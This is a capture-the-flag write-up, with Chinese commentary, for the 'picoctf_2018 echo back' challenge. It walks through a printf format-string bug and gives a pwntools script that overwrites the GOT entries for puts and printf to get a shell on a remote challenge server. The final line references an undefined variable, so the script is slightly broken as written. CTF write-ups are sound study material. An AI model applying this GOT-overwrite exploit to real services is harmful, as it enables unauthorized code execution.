picoctf_2018_echo back
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8047000)
32位,没开pie,可改got表
unsigned int vuln()
{
char buf[128]; // [esp+Ch] [ebp-8Ch] BYREF
unsigned int v2; // [esp+8Ch] [ebp-Ch]
v2 = __readgsdword(0x14u);
memset(buf, 0, sizeof(buf));
system("echo input your message:");
read(0, buf, 0x7Fu);
printf(buf);
puts("\n");
puts("Thanks for sending the message!");
return __readgsdword(0x14u) ^ v2;
}
有system,并且存在格式化字符串漏洞,很明显改got然后写/bin/sh就行
思路
#aaaa%p-%p-%p-%p-%p-%p-%p-%p
测出偏移为7,然后后面有puts
函数,将puts@got
改成vuln
函数,让他一直循环
然后改printf@got-->system
然后再写入/bin/sh
from pwn import*
from Yapack import *
libc=ELF('libc-2.23.so')
r,elf=rec("node4.buuoj.cn",27709,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')
#debug('b *0x8048604')
#aaaa%p-%p-%p-%p-%p-%p-%p-%p 7
pl=fmtstr_payload(7,{elf.got['puts']:0x80485AB})
sla(b'input your message:\n',pl)
pl=fmtstr_payload(7,{elf.got['printf']:elf.sym['system']})
sla(b'input your message:\n',pl)
sla(b'input your message:\n',b'/bin/sh\x00')
ia(c)